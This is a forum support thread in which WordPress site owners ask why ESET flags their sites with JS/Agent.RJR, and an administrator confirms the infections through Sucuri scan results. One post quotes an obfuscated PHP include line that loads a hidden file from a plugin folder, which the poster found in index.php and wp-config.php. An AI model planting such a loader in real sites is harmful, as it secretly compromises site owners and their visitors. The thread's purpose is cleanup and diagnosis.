kichus 0 Posted January 27 Share Posted January 27 The following WordPress website https://infinitumpartners.com.au/ is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed. None of the internal scans showing any malicious codes present. Could you please help us to locate the actual issue. It is critical as it's our business is affected. Thank you so much in advance. Quote Link to comment Share on other sites More sharing options...
Administrators Marcos 5,088 Posted January 27 Administrators Share Posted January 27 The website was compromised and contains the JS malware detected by ESET: https://sitecheck.sucuri.net/results/https/infinitumpartners.com.au kichus 1 Quote Link to comment Share on other sites More sharing options...
kichus 0 Posted January 27 Author Share Posted January 27 Thank you so much for your quick reply. We have seen this report already but are not seeing any traces of this code in the source code nor in DB. Could you please help us how to locate the code and also is it any location specific? Thank you in advance. Quote Link to comment Share on other sites More sharing options...
Administrators Marcos 5,088 Posted January 27 Administrators Share Posted January 27 Unfortunately we can't tell. We don't provide website cleaning and monitoring services nor have access to your web server and database. We merely scan the html code downloaded from the Internet. Quote Link to comment Share on other sites More sharing options...
kichus 0 Posted January 27 Author Share Posted January 27 Thank you. appreciate your time. Quote Link to comment Share on other sites More sharing options...
itman 1,667 Posted January 27 Share Posted January 27 40 minutes ago, Glassertje said: The website is working here. No warning. Same here using Firefox. However, Sucuri detects web site injection. It could be Eset Secure Browser mode for EIS and ESSP is blocking the code injection. It also appears to be an infected WorkPress plug-in, http://infinitumpartners.com.au/wp-content/uploads/2021/11/OTP2-Dark-overlay-60.jpg?id=3552 Quote Link to comment Share on other sites More sharing options...
Administrators Marcos 5,088 Posted January 27 Administrators Share Posted January 27 No detection now either. I recollect that the Sucuri scanner caches results for some time, ie. it's still showing the malicious code even if it has been removed today. Quote Link to comment Share on other sites More sharing options...
MicroS 0 Posted January 29 Share Posted January 29 HI. On my website https://pgmprzemysl.pl ESET detects JS/Agent.RJR. I scanned website on VirtusTotal (https://www.virustotal.com/gui/url/a62fdc26b3fcd54a45a5d1a3e431f154fade046c29fdc57a70438839ec9f92d4) but scanner shows that everything is clean. I found something like $r9 = "//wp\x2dcontent/plug\x69ns/dupl\x69cate\x2dpage/.e6da785f.ccss"; strpos($r9, 't5y'); @include_once /* p2bc */ ($r9); in index.php and wp-config.php files and I removed this, but still JS/Agent.RJR is somewhere detected. What else should I check? Quote Link to comment Share on other sites More sharing options...
Administrators Marcos 5,088 Posted January 29 Administrators Share Posted January 29 2 hours ago, MicroS said: What else should I check? Please refer to https://sitecheck.sucuri.net/results/https/pgmprzemysl.pl. Quote Link to comment Share on other sites More sharing options...
itman 1,667 Posted January 29 Share Posted January 29 24 minutes ago, Marcos said: Please refer to https://sitecheck.sucuri.net/results/https/pgmprzemysl.pl. Sucuri is detecting magneto malware; namely malware.magento_shoplift.38.1. Refer to this article: https://labs.sucuri.net/signatures/sitecheck/malware-magento_shoplift-38-1/ . Quote Link to comment Share on other sites More sharing options...
kandrea 0 Posted January 30 Share Posted January 30 Same here, on uphotelbudapest.com. We try to find and delete the infected files, and now ESET doesn't block website but sucuri still write this: Warning: Malware Detected Infected with malware. Immediate action is required What could we do? Quote Link to comment Share on other sites More sharing options...
Administrators Marcos 5,088 Posted January 30 Administrators Share Posted January 30 8 minutes ago, kandrea said: Same here, on uphotelbudapest.com. We try to find and delete the infected files, and now ESET doesn't block website but sucuri still write this: Warning: Malware Detected Infected with malware. Immediate action is required The website is indeed infected and needs to be cleaned: https://sitecheck.sucuri.net/results/uphotelbudapest.com Quote Link to comment Share on other sites More sharing options...
itman 1,667 Posted January 30 Share Posted January 30 1 hour ago, Marcos said: The website is indeed infected and needs to be cleaned: https://sitecheck.sucuri.net/results/uphotelbudapest.com Looks like the web site is no longer infected. Neither Sucuri or Eset detect any malware. Quote Link to comment Share on other sites More sharing options...
Raxel 0 Posted January 31 Share Posted January 31 Seems I'm getting the warning from https://www.lifelabs.com/ for agent.RJR. A bit scary, as it's a gateway to medical records. Any chance it's not a valid threat? Quote Link to comment Share on other sites More sharing options...
Administrators Marcos 5,088 Posted January 31 Administrators Share Posted January 31 5 hours ago, Raxel said: Seems I'm getting the warning from https://www.lifelabs.com/ for agent.RJR. A bit scary, as it's a gateway to medical records. Any chance it's not a valid threat? The website is indeed infected: Raxel 1 Quote Link to comment Share on other sites More sharing options...
Raxel 0 Posted January 31 Share Posted January 31 7 hours ago, Marcos said: The website is indeed infected: Thank you! That could be a bad one, for sure. Quote Link to comment Share on other sites More sharing options...
AmadeusConcept 0 Posted February 8 Share Posted February 8 Hello, The following WordPress website https://le-blog-des-leaders.com. is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed in Wordpress. None of the internal scans showing any malicious codes present. Could you please help us to locate the actual issue. It is critical as it's our business is affected. Thank you so much in advance. Quote Link to comment Share on other sites More sharing options...
Administrators Marcos 5,088 Posted February 8 Administrators Share Posted February 8 12 minutes ago, AmadeusConcept said: is blocked by ESET with a JS.Agent.rjr trojan warning. It's only showing for users with ESET installed and loading fine for other website users. We have all the plugin and Core files up-to-date and have Security plugins installed in Wordpress. The website is indeed infected: https://sitecheck.sucuri.net/results/https/le-blog-des-leaders.com Quote Link to comment Share on other sites More sharing options...
Bruno777 0 Posted February 9 Share Posted February 9 We have the same problem on our website: https:aripar.org. Validated at https://sitecheck.sucuri.net/results/https/aripar.org there is no problem. Only blocked by ESET users Quote Link to comment Share on other sites More sharing options...
Administrators Marcos 5,088 Posted February 10 Administrators Share Posted February 10 8 hours ago, Bruno777 said: We have the same problem on our website: https:aripar.org. Validated at https://sitecheck.sucuri.net/results/https/aripar.org there is no problem. Only blocked by ESET users The website is indeed infected: Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.